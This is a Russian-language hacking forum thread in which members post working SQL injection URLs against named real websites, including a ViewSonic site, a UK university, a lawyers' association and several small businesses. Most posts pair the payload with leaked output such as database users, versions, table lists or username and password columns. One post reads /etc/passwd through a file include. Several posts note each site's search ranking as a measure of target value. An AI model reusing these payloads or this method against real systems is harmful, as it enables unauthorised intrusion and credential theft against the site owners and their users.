SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    Колонка 3 попадает в функцию include()

    http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,'../../../../../etc/passwd'--+

    магия активирована, поэтому захексим

    http://www.ptk-tehgaz.ru/products.php?emc=2&id=-20+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764--+
     
    _________________________
    7 people like this.
  2. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    310
    Likes Received:
    76
    Reputations:
    19
    http://aalborgstift.dk/pdb/pview.php?id=-705+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,userId,userName,password),9,10,11+from+user+--+

    PR3
     
    1 person likes this.
  3. veter069

    veter069 Member

    Joined:
    15 Nov 2008
    Messages:
    85
    Likes Received:
    10
    Reputations:
    0
    http://www.elephant.se/search.php?q=%22%20and%201=2%20union%20select%20CONCAT(user(),0x3a,version())/*%20and%20char(124)%20user%20char(124)=0%22%20and%20%22x%22=%22x
     
    1 person likes this.
  4. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.master-naba.com/page.php?contentId=-377+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29--
    username: master_naba_com@85.235.130.54
    version: 5.0.45-log
    database: master_naba_com

    Google PR: 5
     
    2 people like this.
  5. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Вариант вывода error-based SQLi

     
    8 people like this.
  6. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    188
    Reputations:
    92
    ViewSonic ®

    Code:
    http://www.viewsonic.com.au/kbase/article.php?id=-128+union+select+1,group_concat%28CHAR%2832,58,32%29%20,username,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15+from+vsau.internal_users%20--
    IP: 60.248.78.41 //Тайвань
    user: web@localhost
    database: vsau

    tables
    Code:
    activity_log, auction_items, crt_displays, dist_info, ecard_categories, ecard_templates, enews, enews_clicks, eregtmp, finch_prize, finch_redeem, finch_sales_results, internal_groups, internal_users, kbase, lcd_displays, map_state, meta_specs, mktg_assets, model_prices, name_to_id, name_to_models, online_service, order_items, pr, product_info, product_reviews, programs, projectors, res_accounts, res_goods_io, res_inventory, res_level_history, res_sales_info, resellers, resinv_format, ressales_import_log, retained_values, user_info, vote, wareg, web_orders, web_promos 
     
  7. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    946
    Likes Received:
    308
    Reputations:
    51
    Code:
    http://www.wesleyan.edu.ph/media.php?id=-17+union+select+version(),2,3,concat(user(),0x3a,database())--
    version: 5.0.91-community
     
    1 person likes this.
  8. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    310
    Likes Received:
    76
    Reputations:
    19
    http://buddie.me/music.php?id=-113482+union+select+1,concat_ws(0x3a,name,password),3,4+from+users+--+
     
  9. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.sirius.perm.ru/cat.php?part=-7%20and%201=2%20union%20select%201,concat_ws(char(58),@@version,user(),database())+--

    5.0.32-Debian_7etch1 sirius@hosting3.ccl.ru dbsirius_1
     
    1 person likes this.
  10. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    310
    Likes Received:
    76
    Reputations:
    19
    http://oldtownrestaurant.co.uk/food.php?id=-1+union+select+1,concat_ws(0x3a,USER(),DATABASE(),VERSION()),3,4+--+

    oldtown_sql@localhost: oldtown_sql:5.0.92-community
     
  11. Megwarez

    Megwarez Member

    Joined:
    7 May 2010
    Messages:
    33
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://www.mapadelisboa.com/li.php?id=-1+union+select+1,2,3,4,group_concat%280x0b,table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+information_schema.tables+--
    PR4

    Все норм выводится но админку не нашел

    Code:
    http://www.profumodizagara.com/ricette/rc.php?id=-1+union+select+1,2,group_concat%280x0b,table_name%29,4,5,6,7,8,9,10,11+from+information_schema.tables+--
    PR3, DMOZ
     
    #13771 Megwarez, 17 Apr 2011
    Last edited: 17 Apr 2011
  12. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    105
    Likes Received:
    28
    Reputations:
    10
    Code:
    http://www.pchelovod.com/index.php?correct=142%27+and+1=0++Union+Select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29--+
    5.1.46: pchelovod_shop@localhost: pchelovod_shop
    Вывод в титле
    тиц 60
     
    1 person likes this.
  13. moodoone

    moodoone Member

    Joined:
    21 Oct 2009
    Messages:
    147
    Likes Received:
    38
    Reputations:
    5
    Code:
    http://chicken.kiev.ua/news_restoran.phtml?id=-2999+union+select+1,2,3,4,5,6,concat_ws(0x3a,email,login),8,9,10,11,12,13,14+from+login--
    ТИЦ 220
    PR 4
    Code:
    http://download.in.ua/program.phtml?os=win&id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C%28SELECT+concat%280x7e%2C0x27%2CCompany.Cm_email%2C0x27%2C0x7e%29+FROM+%60db_westbyte_1%60.Company+Order+by+Cm_email+LIMIT+0%2C1%29+--
    Вывод в исходнике. Выводит юзверей.
    <meta name="keywords" content="~'00790@mail.ru'~" />
    Тиц 40
    PR 4
     
    #13773 moodoone, 17 Apr 2011
    Last edited: 17 Apr 2011
    2 people like this.
  14. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www.lawyersalliance.com.au/public.php?id=-25+union+select+1,2,cast%28concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29%20as%20binary%29,4,5,6,7,8%20from%20users--
    Username: ALA_admin@localhost
    Version: 4.1.11-standard
    Database: ALA

    Google PR: 5

    admin
     
    1 person likes this.
  15. Megwarez

    Megwarez Member

    Joined:
    7 May 2010
    Messages:
    33
    Likes Received:
    12
    Reputations:
    4
    Code:
    http://www.g1expo.com/artists-ch.php?id=-1+union+select+1,2,3,4,5,group_concat%280x0b,table_name%29,7+from+information_schema.tables+--
    PR 5
     
  16. Jаger

    Jаger Banned

    Joined:
    26 Mar 2011
    Messages:
    7
    Likes Received:
    12
    Reputations:
    10
    http://www.teleradiocom.tj/index.php?action=fullnews&id=-50 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,id,username,password),10,11,12,13,14,15,16,17,18,19 from users limit 0,1
     
    1 person likes this.
  17. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    105
    Likes Received:
    28
    Reputations:
    10
    helloworld.ru

    Helloworld.ru

    Ашибочка :)

    Code:
    http://www.helloworld.ru/show.php?curraz=27+and+1=0+union+select+UNHEX%28HEX%28CONCAT_WS%280x3a,database%28%29,version%28%29,user%28%29%29%20%29%29
    hellowor_hello:5.0.91-community:hellowor_hello@localhost
     
    1 person likes this.
  18. bloodAngel

    bloodAngel Banned

    Joined:
    29 Jun 2007
    Messages:
    24
    Likes Received:
    25
    Reputations:
    -1
    shop ))
    5.0.41-community-log: ISMBMDR_webdb_drsha
     
    1 person likes this.
  19. av1

    av1 Elder - Старейшина

    Joined:
    6 Oct 2008
    Messages:
    720
    Likes Received:
    104
    Reputations:
    58
    Code:
    http://www2.hud.ac.uk/staffprofiles/staffcv.php?staffid=-508+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,22--
    Username: clseditor@tamnavulin.talisker.hud.ac.uk
    Version: 5.1.55-log
    Database: staffprofiles

    Google PR: 4
     
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.unisdr.org/africa/events/index.php?rid=0&timeID=1&tid=0&oid=6)+or+1+group+by+concat((select+concat(user(),0x3a3a,User,0x3a3a,file_priv)+from+mysql.user+limit+3,1),floor(rand(0)*2))+having+min(0)--+&hid=60

    Баанк!!!(co Jay & Silent BOB) =)
     
Loading...
Thread Status:
Not open for further replies.